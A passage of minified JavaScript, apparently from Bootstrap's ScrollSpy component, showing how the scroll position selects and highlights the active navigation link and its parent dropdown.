scrollHeight = this._getScrollHeight(); var maxScroll = this._config.offset + scrollHeight - this._getOffsetHeight(); if (this._scrollHeight !== scrollHeight) { this.refresh(); } if (scrollTop >= maxScroll) { var target = this._targets[this._targets.length - 1]; if (this._activeTarget !== target) { this._activate(target); } return; } if (this._activeTarget && scrollTop < this._offsets[0] && this._offsets[0] > 0) { this._activeTarget = null; this._clear(); return; } var offsetLength = this._offsets.length; for (var i = offsetLength; i--;) { var isActiveTarget = this._activeTarget !== this._targets[i] && scrollTop >= this._offsets[i] && (typeof this._offsets[i + 1] === 'undefined' || scrollTop < this._offsets[i + 1]); if (isActiveTarget) { this._activate(this._targets[i]); } } }; _proto._activate = function _activate(target) { this._activeTarget = target; this._clear(); var queries = this._selector.split(',').map(function (selector) { return selector + "[data-target=\"" + target + "\"]," + selector + "[href=\"" + target + "\"]"; }); var $link = $([].slice.call(document.querySelectorAll(queries.join(',')))); if ($link.hasClass(ClassName$8.DROPDOWN_ITEM)) { $link.closest(Selector$8.DROPDOWN).find(Selector$8.DROPDOWN_TOGGLE).addClass(ClassName$8.ACTIVE); $link.addClass(ClassName$8.ACTIVE); } else { // Set triggered link as active $link.addClass(ClassName$8.ACTIVE); // Set triggered links parents as active // With both